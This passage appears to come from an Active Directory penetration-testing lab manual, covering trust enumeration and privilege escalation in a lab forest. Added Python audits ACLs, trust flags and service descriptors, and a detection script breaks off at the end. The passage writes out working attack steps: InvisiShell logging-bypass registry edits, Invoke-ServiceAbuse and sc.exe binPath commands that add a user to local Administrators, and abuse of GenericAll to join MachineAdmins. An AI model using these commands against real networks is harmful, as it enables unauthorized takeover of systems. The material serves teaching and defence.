WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-210670787-2521448726-163245708-1147' to a distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-210670787-2521448726-163245708-1147' to a distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-210670787-2521448726-163245708-1147' to a distinguishedname with Convert-ADName

ObjectDN : CN=Support11User,CN=Users,DC=us,DC=techcorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-210670787-2521448726-163245708-1116
IdentityReferenceName : studentusers
IdentityReferenceDomain : us.techcorp.local
IdentityReferenceDN : CN=StudentUsers,CN=Users,DC=us,DC=techcorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support12User,CN=Users,DC=us,DC=techcorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-210670787-2521448726-163245708-1116
IdentityReferenceName : studentusers
IdentityReferenceDomain : us.techcorp.local
IdentityReferenceDN : CN=StudentUsers,CN=Users,DC=us,DC=techcorp,DC=local
IdentityReferenceClass : group

[snip]
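
The two outputs above repay a careful read. The first ACE Get-DomainObjectAcl printed on Domain Admins grants CreateChild, DeleteChild, ListChildren (AccessMask 7) but carries ContainerInherit and InheritOnly with an InheritedObjectAceType of inetOrgPerson, so it is a template for inetOrgPerson descendants and grants nothing on the group object itself. The StudentUsers ACEs found by Find-InterestingDomainAcl, by contrast, are GenericAll with no inheritance flags and so apply directly to each Support user. The Python below is an added example, not the course's or PowerView's code: it decodes an AccessMask into the System.DirectoryServices.ActiveDirectoryRights names the tools print, checks whether an ACE applies to the object it sits on, and marks the rights that allow modification (an approximation of what Find-InterestingDomainAcl keeps). The ACE records are constructed from the fields shown above.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple

# System.DirectoryServices.ActiveDirectoryRights values, the names PowerView and the
# AD module print. Composite values (Generic*) are listed with the single bits.
RIGHTS: List[Tuple[str, int]] = [
    ("CreateChild", 0x1), ("DeleteChild", 0x2), ("ListChildren", 0x4), ("Self", 0x8),
    ("ReadProperty", 0x10), ("WriteProperty", 0x20), ("DeleteTree", 0x40),
    ("ListObject", 0x80), ("ExtendedRight", 0x100), ("Delete", 0x10000),
    ("ReadControl", 0x20000), ("WriteDacl", 0x40000), ("WriteOwner", 0x80000),
    ("Synchronize", 0x100000), ("AccessSystemSecurity", 0x1000000),
    ("GenericExecute", 0x20004), ("GenericWrite", 0x20028),
    ("GenericRead", 0x20094), ("GenericAll", 0xF01FF),
]
# Rights that change the object or its security descriptor. GenericAll and
# GenericWrite contain these bits, so they are covered too. This approximates
# the filter Find-InterestingDomainAcl applies.
MODIFY_MASK = 0x20 | 0x8 | 0x40000 | 0x80000  # WriteProperty, Self, WriteDacl, WriteOwner


@dataclass(frozen=True)
class Ace:
    object_dn: str
    identity: str
    access_mask: int
    ace_flags: Set[str] = field(default_factory=set)  # e.g. {"ContainerInherit", "InheritOnly"}
    object_ace_type: str = "None"
    inherited_object_ace_type: str = "None"


# Constructed from the ACEs printed above (two on Domain Admins, one on Support11User).
SAMPLE_ACES: List[Ace] = [
    Ace("CN=Domain Admins,CN=Users,DC=us,DC=techcorp,DC=local",
        "S-1-5-21-2781415573-3701854478-2406986946-1119", 7,
        {"ContainerInherit", "InheritOnly"}, "ms-Exch-Active-Sync-Devices", "inetOrgPerson"),
    Ace("CN=Domain Admins,CN=Users,DC=us,DC=techcorp,DC=local",
        "NT AUTHORITY\\Authenticated Users", 0x20094),
    Ace("CN=Support11User,CN=Users,DC=us,DC=techcorp,DC=local", "studentusers", 0xF01FF),
]


def decode_rights(mask: int) -> List[str]:
    """Name the bits of an AccessMask the way .NET formats the flags enum: match
    the largest values first, then list the matched names in ascending order."""
    names: List[str] = []
    remaining = mask
    for name, value in sorted(RIGHTS, key=lambda kv: kv[1], reverse=True):
        if remaining & value == value:
            names.append(name)
            remaining &= ~value
    names.reverse()
    if remaining:
        names.append(hex(remaining))  # bits outside the enum, kept visible
    return names


def applies_to_object_itself(ace: Ace) -> bool:
    """An INHERIT_ONLY ACE is only a template for child objects."""
    return "InheritOnly" not in ace.ace_flags


def audit_aces(aces: List[Ace]) -> List[Dict]:
    """Per ACE: decoded rights, what it applies to, and whether it lets the
    identity modify the object it is set on."""
    findings: List[Dict] = []
    for ace in aces:
        direct = applies_to_object_itself(ace)
        if not direct:
            scope = f"inherit-only: {ace.inherited_object_ace_type} descendants, not this object"
        elif ace.object_ace_type != "None":
            scope = f"object-specific: {ace.object_ace_type}"
        else:
            scope = "whole object"
        findings.append({
            "object": ace.object_dn, "identity": ace.identity,
            "rights": decode_rights(ace.access_mask), "scope": scope,
            "modify": direct and bool(ace.access_mask & MODIFY_MASK),
        })
    return findings


def modify_holders(aces: List[Ace]) -> List[Tuple[str, str]]:
    """(identity, object) pairs where the identity can modify the object."""
    return [(f["identity"], f["object"]) for f in audit_aces(aces) if f["modify"]]


if __name__ == "__main__":
    for finding in audit_aces(SAMPLE_ACES):
        print(finding)
```

Only the StudentUsers ACE comes out as a modify right: the Exchange ACE on Domain Admins is filtered out by its InheritOnly flag before its mask is even considered, and Authenticated Users' GenericRead contains none of the write bits. ExtendedRight (control access rights such as password reset) is deliberately not in MODIFY_MASK here, because whether it matters depends on the resolved ObjectAceType GUID.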

Hands-On 4:
Task
• Enumerate all domains in the techcorp.local forest.
• Map the trusts of the us.techcorp.local domain.
• Map external trusts in techcorp.local forest.
• Identify external trusts of the us domain. Can you enumerate trusts for a trusting forest?

Solution
Let’s enumerate all domains using the ActiveDirectory module from InvisiShell:

PS C:\AD\Tools> (Get-ADForest).Domains
techcorp.local
us.techcorp.local

To map the trusts of the us.techcorp.local domain:

PS C:\AD\Tools> Get-ADTrust -Filter *


Direction : BiDirectional
DisallowTransivity : False
DistinguishedName :
CN=techcorp.local,CN=System,DC=us,DC=techcorp,DC=local
ForestTransitive : False
IntraForest : True
IsTreeParent : False
IsTreeRoot : False
Name : techcorp.local
ObjectClass : trustedDomain
ObjectGUID : fe8ef343-0882-490d-8ad2-cb4fb9f974ae
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=us,DC=techcorp,DC=local
Target : techcorp.local
TGTDelegation : False
TrustAttributes : 32
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False

Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=eu.local,CN=System,DC=us,DC=techcorp,DC=local
ForestTransitive : False
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : eu.local
ObjectClass : trustedDomain
ObjectGUID : 917942a6-ef2d-4c87-8084-35ad6281c89b
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : True
Source : DC=us,DC=techcorp,DC=local
Target : eu.local
TGTDelegation : False
TrustAttributes : 4
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False

If we want to map all the trusts of the techcorp.local forest:

PS C:\AD\Tools> Get-ADTrust -Filter 'intraForest -ne $True' -Server (Get-ADForest).Name

Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=usvendor.local,CN=System,DC=techcorp,DC=local
ForestTransitive : True
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : usvendor.local
ObjectClass : trustedDomain
ObjectGUID : 481a3ade-0e65-4dc5-baf0-fc692a3a10c5
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=techcorp,DC=local
Target : usvendor.local
TGTDelegation : False
TrustAttributes : 8
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False

Direction : Inbound
DisallowTransivity : False
DistinguishedName : CN=bastion.local,CN=System,DC=techcorp,DC=local
ForestTransitive : True
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : bastion.local
ObjectClass : trustedDomain
ObjectGUID : aa11321f-6629-4deb-a2fe-2bf79e169904
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=techcorp,DC=local
Target : bastion.local
TGTDelegation : False
TrustAttributes : 8
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False

Now, to list only the external trusts, using the ActiveDirectory module:

PS C:\AD\Tools> (Get-ADForest).Domains | %{Get-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)' -Server $_}

Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=eu.local,CN=System,DC=us,DC=techcorp,DC=local
ForestTransitive : False
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : eu.local
ObjectClass : trustedDomain
ObjectGUID : 917942a6-ef2d-4c87-8084-35ad6281c89b
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : True
Source : DC=us,DC=techcorp,DC=local
Target : eu.local
TGTDelegation : False
TrustAttributes : 4
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False

To list only the external trusts using PowerView:

PS C:\AD\Tools> Get-ForestDomain -Verbose | Get-DomainTrust | ?{$_.TrustAttributes -eq 'FILTER_SIDS'}
VERBOSE: [Get-DomainSearcher] search base: LDAP://US-
DC.US.TECHCORP.LOCAL/DC=techcorp,DC=local
VERBOSE: [Get-DomainUser] filter string:
(&(samAccountType=805306368)(|(samAccountName=krbtgt)))

SourceName : us.techcorp.local
TargetName : eu.local
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FILTER_SIDS
TrustDirection : Bidirectional
WhenCreated : 7/13/2019 11:17:35 AM
WhenChanged : 1/7/2021 11:38:29 AM

Note that we have a bi-directional trust with eu.local. In a bi-directional trust or incoming one-way trust
from eu.local to us.techcorp.local, we can extract information from the eu.local forest. Let's go for the
last task and enumerate trusts for eu.local forest using the Active Directory module:

PS C:\AD\Tools> Get-ADTrust -Filter * -Server eu.local


Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=us.techcorp.local,CN=System,DC=eu,DC=local
ForestTransitive : False
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : us.techcorp.local
ObjectClass : trustedDomain
ObjectGUID : 2d5aff75-d002-4b92-ab1a-8313f9a6205f
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : True
Source : DC=eu,DC=local
Target : us.techcorp.local
TGTDelegation : False
TrustAttributes : 4
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False

Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=euvendor.local,CN=System,DC=eu,DC=local
ForestTransitive : True
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : euvendor.local
ObjectClass : trustedDomain
ObjectGUID : 7f2eb7ca-70bc-4f72-92a7-c04aaaf296c4
SelectiveAuthentication : False
SIDFilteringForestAware : True
SIDFilteringQuarantined : False
Source : DC=eu,DC=local
Target : euvendor.local
TGTDelegation : False
TrustAttributes : 72
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False

Using PowerView:

PS C:\AD\Tools> Get-ForestTrust -Forest eu.local

TopLevelNames : {euvendor.local}
ExcludedTopLevelNames : {}
TrustedDomainInformation : {euvendor.local}
SourceName : eu.local
TargetName : euvendor.local
TrustType : Forest
TrustDirection : Bidirectional
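
The TrustAttributes values above (32, 4, 8, 72) are a bitmask, and the AD module's SIDFilteringQuarantined and SIDFilteringForestAware booleans are just two of its bits. The following decoder is an added example, not code from the lab manual or from either tool: it names the bits using the trustAttributes definitions from MS-ADTS and raises the findings a reviewer would want from a trust inventory (an external trust without SID filtering, a forest trust marked TREAT_AS_EXTERNAL, RC4 on the trust). The sample trust list is constructed from the values shown above.

```python
"""Decode trustAttributes values and flag weak trust settings.

Added example, not part of the lab manual. The bit names follow the
trustAttributes definitions in MS-ADTS; the sample trusts are constructed from
the TrustAttributes values in the Get-ADTrust output above (32, 4, 8, 8, 72).
"""

# Bits of the trustAttributes attribute (MS-ADTS).
TRUST_ATTRIBUTE_FLAGS = {
    0x0001: "NON_TRANSITIVE",
    0x0002: "UPLEVEL_ONLY",
    0x0004: "QUARANTINED_DOMAIN",  # SID filtering on; PowerView shows FILTER_SIDS
    0x0008: "FOREST_TRANSITIVE",
    0x0010: "CROSS_ORGANIZATION",
    0x0020: "WITHIN_FOREST",
    0x0040: "TREAT_AS_EXTERNAL",  # AD module: SIDFilteringForestAware
    0x0080: "USES_RC4_ENCRYPTION",
    0x0200: "CROSS_ORGANIZATION_NO_TGT_DELEGATION",
    0x0400: "PIM_TRUST",
    0x0800: "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION",
}


def decode_trust_attributes(value):
    """Names of the flags set in a trustAttributes value, lowest bit first."""
    return [name for bit, name in sorted(TRUST_ATTRIBUTE_FLAGS.items()) if value & bit]


def classify_trust(value):
    """'intra-forest', 'forest' (cross-forest transitive) or 'external'."""
    if value & 0x0020:
        return "intra-forest"
    if value & 0x0008:
        return "forest"
    return "external"


def trust_findings(name, value):
    """Review findings for one trust object (empty list means nothing to raise)."""
    kind = classify_trust(value)
    findings = []
    if kind == "external" and not value & 0x0004:
        findings.append(f"{name}: external trust without SID filtering "
                        "(QUARANTINED_DOMAIN not set), sidHistory from it is not filtered")
    if kind == "forest" and value & 0x0040:
        findings.append(f"{name}: forest trust marked TREAT_AS_EXTERNAL, "
                        "SID filtering relaxed to external-trust rules")
    if value & 0x0080:
        findings.append(f"{name}: RC4 enabled for the trust (USES_RC4_ENCRYPTION)")
    return findings


# Constructed from the trust records shown above: (name, direction, TrustAttributes).
SAMPLE_TRUSTS = [
    ("techcorp.local", "BiDirectional", 32),
    ("eu.local", "BiDirectional", 4),
    ("usvendor.local", "BiDirectional", 8),
    ("bastion.local", "Inbound", 8),
    ("euvendor.local", "BiDirectional", 72),
]


def review(trusts):
    """Per-trust summary: direction, kind, decoded flags and findings."""
    return {
        name: {
            "direction": direction,
            "kind": classify_trust(value),
            "flags": decode_trust_attributes(value),
            "findings": trust_findings(name, value),
        }
        for name, direction, value in trusts
    }


if __name__ == "__main__":
    for name, info in review(SAMPLE_TRUSTS).items():
        print(f"{name:16} {info['kind']:12} {','.join(info['flags'])}")
        for finding in info["findings"]:
            print("   !", finding)
```

Run against the lab values, eu.local (4) decodes to QUARANTINED_DOMAIN, which is why PowerView reported it as FILTER_SIDS, and euvendor.local (72) decodes to FOREST_TRANSITIVE plus TREAT_AS_EXTERNAL, matching SIDFilteringForestAware : True in the eu.local output; that is the one trust in the list a reviewer would flag.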

Hands-On 5:
Task
• Exploit a service on studentx and elevate privileges to local administrator.
• Identify a machine in the domain where studentuserx has local administrative access due to
group membership.

Solution
We can use any of PowerUp, beRoot, Invoke-Privesc or AccessChk from the Sysinternals suite to
look for service-related issues.

PowerUp
Let's use PowerUp from InvisiShell. Remember to run it from a new process and not from the
one where PowerView is loaded:

C:\Users\studentuserx>cd C:\AD\Tools\

C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

C:\AD\Tools>set COR_ENABLE_PROFILING=1

C:\AD\Tools>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f
The operation completed successfully.

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /f
The operation completed successfully.

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /ve /t REG_SZ /d "C:\AD\Tools\InviShell\InShellProf.dll" /f
The operation completed successfully.

C:\AD\Tools>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\AD\Tools> . C:\AD\Tools\PowerUp.ps1
PS C:\AD\Tools> Invoke-AllChecks
[*] Running Invoke-AllChecks
[snip]
[*] Checking service permissions...
ServiceName : ALG
Path : C:\Windows\System32\alg.exe
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'ALG'
CanRestart : True
[snip]

Let’s use the abuse function for the service permission issue and add our current domain user to the local
Administrators group.

PS C:\AD\Tools> Invoke-ServiceAbuse -Name ALG -UserName us\studentuserx -Verbose
VERBOSE: Service 'ALG' original path: 'C:\Windows\System32\alg.exe'
VERBOSE: Service 'ALG' original state: 'Running'
VERBOSE: Executing command 'net localgroup Administrators us\studentuserx
/add'
VERBOSE: binPath for ALG successfully set to 'net localgroup Administrators
us\studentuserx /add'
VERBOSE: Restoring original path to service 'ALG'
VERBOSE: binPath for ALG successfully set to 'C:\Windows\System32\alg.exe'
VERBOSE: Restarting 'ALG'

ServiceAbused Command
------------- -------
ALG net localgroup Administrators us\studentuserx /add

We can see that us\studentuserx is now a local administrator. Log off and log on again and we have
local administrator privileges!

AccessChk
The same attack can be executed with accesschk64.exe from Sysinternals:

PS C:\AD\Tools\AccessChk> .\accesschk64.exe -uwcqv 'studentuserx' *

Accesschk v6.12 - Reports effective permissions for securable objects


Copyright (C) 2006-2017 Mark Russinovich
Sysinternals - www.sysinternals.com

RW ALG
SERVICE_ALL_ACCESS

We can see that studentuserx has full permissions (SERVICE_ALL_ACCESS) on the ALG service. Let's abuse the
permissions manually:

sc.exe config ALG binPath= "net localgroup administrators us\studentuserx /add"
sc.exe stop ALG
sc.exe start ALG
sc.exe config ALG binPath= "C:\WINDOWS\System32\alg.exe"
sc.exe stop ALG
sc.exe start ALG
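
The issue both PowerUp and AccessChk found is a service DACL that grants an ordinary user SERVICE_CHANGE_CONFIG (the right behind sc.exe config). The same check can be run as a defender over the SDDL string that sc.exe sdshow <service> prints for every service on a host. The following parser is an added example, not code from the lab manual, PowerUp or Sysinternals: it splits the DACL into ACEs, maps the two-letter service rights (and numeric masks) to names, and reports any allow ACE that gives a principal outside an allow-list a right sufficient to reconfigure or take over the service. The two SDDL strings are constructed: one is the stock default service descriptor, the other grants Builtin\Users the DC right and a domain SID SERVICE_ALL_ACCESS (0xF01FF), which is what the lab output above showed for studentuserx.

```python
"""Audit a Windows service security descriptor (SDDL from 'sc.exe sdshow') for
rights that let a low-privileged principal reconfigure the service.

Added example, not from the lab manual. The SDDL strings are constructed: one is
the default service descriptor, the other grants Builtin\\Users SERVICE_CHANGE_CONFIG
('DC') and a domain SID SERVICE_ALL_ACCESS, the condition Invoke-ServiceAbuse needs.
"""
import re

# Service-specific access rights in SDDL two-letter form (see the 'sc sdshow' docs).
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GW": "GENERIC_WRITE", "GR": "GENERIC_READ", "GX": "GENERIC_EXECUTE",
}
# Bits that matter when an ACE is written as a hex mask instead of letter codes.
RIGHT_MASKS = {
    0x0002: "SERVICE_CHANGE_CONFIG", 0x10000: "DELETE", 0x40000: "WRITE_DAC",
    0x80000: "WRITE_OWNER", 0x10000000: "GENERIC_ALL", 0x40000000: "GENERIC_WRITE",
}
# Rights that allow swapping the service binary or rewriting its ACL.
DANGEROUS = {"SERVICE_CHANGE_CONFIG", "WRITE_DAC", "WRITE_OWNER",
             "GENERIC_ALL", "GENERIC_WRITE", "DELETE"}
# Principals expected to control services (SDDL aliases and raw SIDs).
PRIVILEGED_SIDS = {"SY", "BA", "S-1-5-18", "S-1-5-32-544"}

ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_rights(field):
    """Set of right names from a letter-code string or a 0x... mask."""
    if field.lower().startswith("0x"):
        mask = int(field, 16)
        return {name for bit, name in RIGHT_MASKS.items() if mask & bit}
    return {SERVICE_RIGHTS.get(field[i:i + 2], field[i:i + 2])
            for i in range(0, len(field), 2)}


def parse_dacl(sddl):
    """Yield (ace_type, rights, sid) for each ACE in the DACL part of an SDDL string."""
    if "D:" not in sddl:
        return
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]  # drop owner/group, stop at SACL
    for ace in ACE_RE.findall(dacl):
        parts = ace.split(";")  # type;flags;rights;object_guid;inherit_guid;sid
        yield parts[0], parse_rights(parts[2]), parts[-1]


def weak_aces(sddl, privileged=PRIVILEGED_SIDS):
    """Allow ACEs that grant a non-privileged principal a dangerous service right."""
    return [(sid, sorted(rights & DANGEROUS))
            for ace_type, rights, sid in parse_dacl(sddl)
            if ace_type == "A" and sid not in privileged and rights & DANGEROUS]


# Constructed: the default descriptor of a Windows service ...
DEFAULT_SERVICE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                        "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                        "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
# ... and a weakened one: Users get DC, a domain group (sample SID) gets SERVICE_ALL_ACCESS.
WEAK_SERVICE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                     "(A;;CCDCLCSWRPWPDTLOCRRC;;;B)(A;;0xF01FF;;;S-1-5-21-0-0-0-1116)"
                     .replace(";;;B)", ";;;BU)"))

if __name__ == "__main__":
    for label, sddl in (("default", DEFAULT_SERVICE_SDDL), ("weak", WEAK_SERVICE_SDDL)):
        print(label, weak_aces(sddl) or "no weak ACEs")
```

Remediation is the reverse of the abuse: reset the descriptor with sc.exe sdset to the default shown above (or to a descriptor that grants change-config only to SYSTEM and Administrators), and keep the check in a scheduled baseline so that a service whose DACL drifts is noticed before someone runs Invoke-AllChecks on it.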

Now, we need to identify a machine in the domain where studentuserx has local administrative access.
Usually hunting for local administrator privileges is the way to go. Using PowerView:

PS C:\AD\Tools> Find-LocalAdminAccess -Verbose


VERBOSE: [Find-LocalAdminAccess] Querying computers in the domain
VERBOSE: [Get-DomainSearcher] search base: LDAP://US-
DC.US.TECHCORP.LOCAL/DC=US,DC=TECHCORP,DC=LOCAL
VERBOSE: [Get-DomainComputer] Get-DomainComputer filter string:
(&(samAccountType=805306369))
VERBOSE: [Find-LocalAdminAccess] TargetComputers length: 22
VERBOSE: [Find-LocalAdminAccess] Using threading with threads: 20
VERBOSE: [New-ThreadedFunction] Total number of hosts: 22
VERBOSE: [New-ThreadedFunction] Total number of threads/partitions: 20
VERBOSE: [New-ThreadedFunction] Threads executing
[snip]

We got no output. Find-WMILocalAdminAccess.ps1 and Find-PSRemotingLocalAdminAccess.ps1 give similar
results.

Let's enumerate group memberships for studentuserx. The ActiveDirectory module command
Get-ADPrincipalGroupMembership does not provide the ability to look up group membership recursively.
Therefore, we can use the following simple PowerShell code from InvisiShell. Note that the code uses the
ActiveDirectory module, so that should be imported first:

function Get-ADPrincipalGroupMembershipRecursive ($SamAccountName)
{
    # Groups the principal is a direct member of, as distinguished names
    $groups = @(Get-ADPrincipalGroupMembership -Identity $SamAccountName | select -ExpandProperty distinguishedname)
    # Emit them, then recurse into each group to collect nested memberships
    $groups
    if ($groups.count -gt 0)
    {
        foreach ($group in $groups)
        {
            Get-ADPrincipalGroupMembershipRecursive $group
        }
    }
}

Get-ADPrincipalGroupMembershipRecursive 'studentuserx'

CN=Domain Users,CN=Users,DC=us,DC=techcorp,DC=local
CN=StudentUsers,CN=Users,DC=us,DC=techcorp,DC=local
CN=Users,CN=Builtin,DC=us,DC=techcorp,DC=local
CN=MaintenanceUsers,CN=Users,DC=us,DC=techcorp,DC=local
CN=Managers,CN=Users,DC=us,DC=techcorp,DC=local

Let's check if any of the above groups has interesting ACL entries. After trying multiple groups, we find
that the us\managers group does have some interesting permissions. Using PowerView from InvisiShell:

PS C:\AD\Tools> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match 'managers'}
[snip]

ObjectDN : CN=MachineAdmins,OU=Mgmt,DC=us,DC=techcorp,DC=local
ObjectSID : S-1-5-21-210670787-2521448726-163245708-1118
IdentitySID : S-1-5-21-210670787-2521448726-163245708-1117
ActiveDirectoryRights : GenericAll
InheritanceType : All
ObjectType : 00000000-0000-0000-0000-000000000000
InheritedObjectType : bf967a9c-0de6-11d0-a285-00aa003049e2
ObjectFlags : InheritedObjectAceTypePresent
AccessControlType : Allow
IdentityReferencename : US\managers
IsInherited : True
InheritanceFlags : ContainerInherit
PropagationFlags : None

We can check the ACEs quickly using Get-DomainObjectAcl from PowerView:

PS C:\AD\Tools> Get-DomainObjectAcl -Identity machineadmins -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match 'managers'}

ObjectDN : CN=MachineAdmins,OU=Mgmt,DC=us,DC=techcorp,DC=local
ObjectSID : S-1-5-21-210670787-2521448726-163245708-1118
ActiveDirectoryRights : ReadProperty, WriteProperty
IdentityName : US\managers
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
ObjectAceType : bf9679c0-0de6-11d0-a285-00aa003049e2
InheritedObjectAceType : bf967a9c-0de6-11d0-a285-00aa003049e2
BinaryLength : 72
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 48
SecurityIdentifier : S-1-5-21-210670787-2521448726-163245708-1117
AceType : AccessAllowedObject
AceFlags : ContainerInherit, Inherited
IsInherited : True
InheritanceFlags : ContainerInherit
PropagationFlags : None
AuditFlags : None
[snip]

So, studentuserx, through membership of the Managers group, has GenericAll rights on the machineadmins
group. Recall from the previous hands-on that machineadmins is a member of a local group in the Mgmt OU.

Also, if we have a look at the machineadmins group, its description explains a lot. Using the ActiveDirectory
module:

PS C:\AD\Tools> Get-ADGroup -Identity machineadmins -Properties Description

Description : Group to manage machines of the Mgmt OU
DistinguishedName : CN=MachineAdmins,OU=Mgmt,DC=us,DC=techcorp,DC=local
GroupCategory : Security
GroupScope : Global
Name : MachineAdmins
ObjectClass : group
ObjectGUID : a02c806e-f233-4c39-a0cc-adf37628365a
SamAccountName : machineadmins
SID : S-1-5-21-210670787-2521448726-163245708-1118

Let's add studentuserx to machineadmins group as we have GenericAll permissions on the group. Using
AD module:

PS C:\AD\Tools> Add-ADGroupMember -Identity MachineAdmins -Members studentuserx -Verbose
VERBOSE: Performing the operation "Set" on target
"CN=MachineAdmins,OU=Mgmt,DC=us,DC=techcorp,DC=local".

Now, check if we have administrative access to the us-mgmt machine in the Mgmt OU (it is the only
machine in that OU). Note that we need to clear our existing TGT so that the new group membership is
included in a new TGT, so a logoff and logon may be required.
We can use winrs for accessing us-mgmt:

C:\Users\studentuserx>winrs -r:us-mgmt cmd

Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\studentuserx>whoami
us\studentuserx

We can also try with PowerShell Remoting. Note that it will have verbose logging on the remote machine:

PS C:\Users\studentuserx> $usmgmt = New-PSSession us-mgmt
PS C:\Users\studentuserx> Enter-PSSession $usmgmt
[us-mgmt]: PS C:\Users\TEMP\Documents> hostname
US-Mgmt
[us-mgmt]: PS C:\Users\TEMP\Documents> whoami
us\studentuserx
[us-mgmt]: PS C:\Users\TEMP\Documents>

BloodHound
Using BloodHound, you can search for the studentuserx node and check 'Group Delegated Object
Control' under Outbound Object Control.
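
Both privilege gains in this hands-on are group membership changes, and each one is written to the Security log: the service abuse adds us\studentuserx to the local Administrators group on the student machine (event 4732, member added to a security-enabled local group), and Add-ADGroupMember adds it to the global MachineAdmins group on the domain controller (event 4728). The following detection logic is an added example, not code from the lab manual or from any of the tools used above. It flags member-added events whose target is a built-in privileged group (matched by well-known RID) or an organisation-specific tier group from a watch list, and adds a second reason when the change was made by SYSTEM rather than an administrator's session. The records, SIDs and hostnames are constructed; the assumption that SYSTEM is logged with the computer account (name ending in $) as the subject is the example's own.

```python
"""Flag additions to privileged groups in Security events 4728/4732/4756.

Added example, not from the lab manual. The two membership changes made above each
leave one of these events: the service abuse adds us\\studentuserx to the local
Administrators group on the student box (4732, on that host) and Add-ADGroupMember
adds it to the global MachineAdmins group (4728, on the domain controller). The
records below are constructed; domain SIDs, the MachineAdmins watch-list entry and
the hostnames are sample values, and the assumption that a change made by SYSTEM is
logged with the computer account (name ending in $) as the subject is the example's.
"""

# RIDs of built-in privileged groups; the same in every domain.
PRIVILEGED_RIDS = {
    "512": "Domain Admins", "518": "Schema Admins", "519": "Enterprise Admins",
    "544": "Administrators", "548": "Account Operators", "551": "Backup Operators",
}
# Organisation-specific tier groups worth watching (sample value from the lab).
WATCHED_GROUPS = {"machineadmins"}
MEMBER_ADDED = {4728: "global group", 4732: "local group", 4756: "universal group"}


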